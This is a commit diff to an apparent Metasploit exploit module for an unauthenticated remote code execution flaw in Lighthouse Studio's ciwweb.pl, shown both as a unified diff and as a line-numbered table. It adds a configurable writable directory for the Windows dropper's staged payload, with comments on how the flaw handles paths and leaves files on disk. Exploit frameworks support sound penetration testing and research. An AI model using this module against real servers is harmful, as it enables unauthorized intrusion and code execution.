Added WritableDir Option

vognik · vognik · commit e93755adc6b7 · 2025-07-23T11:59:48.000+04:00
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb
@@ -85,7 +85,7 @@ def initialize(info = {})
         'DisclosureDate' => '2025-07-16',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'SideEffects' => [IOC_IN_LOGS],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
           'Reliability' => [REPEATABLE_SESSION]
         }
       )
@@ -95,6 +95,7 @@ def initialize(info = {})
       [
         OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),
         OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),
+        OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\'])
       ]
     )
   end
@@ -163,7 +164,10 @@ def exploit
 
     case target['Type']
     when :windows_dropper
-      execute_cmdstager(temp: '.')
+      # This applies only to Windows
+      # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly
+      # Files on the disk are also not deleted
+      execute_cmdstager(temp: datastore['WritableDir'])
     when :nix_dropper
       execute_cmdstager
     when :windows_command, :nix_command

Original file line number	Diff line number	Diff line change
`@@ -85,7 +85,7 @@ def initialize(info = {})`
`85`	`85`	`'DisclosureDate' => '2025-07-16',`
`86`	`86`	`'Notes' => {`
`87`	`87`	`'Stability' => [CRASH_SAFE],`
`88`		`- 'SideEffects' => [IOC_IN_LOGS],`
	`88`	`+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],`
`89`	`89`	`'Reliability' => [REPEATABLE_SESSION]`
`90`	`90`	`}`
`91`	`91`	`)`
`@@ -95,6 +95,7 @@ def initialize(info = {})`
`95`	`95`	`[`
`96`	`96`	`OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']),`
`97`	`97`	`OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']),`
	`98`	`+ OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\'])`
`98`	`99`	`]`
`99`	`100`	`)`
`100`	`101`	`end`
`@@ -163,7 +164,10 @@ def exploit`
`163`	`164`
`164`	`165`	`case target['Type']`
`165`	`166`	`when :windows_dropper`
`166`		`- execute_cmdstager(temp: '.')`
	`167`	`+ # This applies only to Windows`
	`168`	`+ # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly`
	`169`	`+ # Files on the disk are also not deleted`
	`170`	`+ execute_cmdstager(temp: datastore['WritableDir'])`
`167`	`171`	`when :nix_dropper`
`168`	`172`	`execute_cmdstager`
`169`	`173`	`when :windows_command, :nix_command`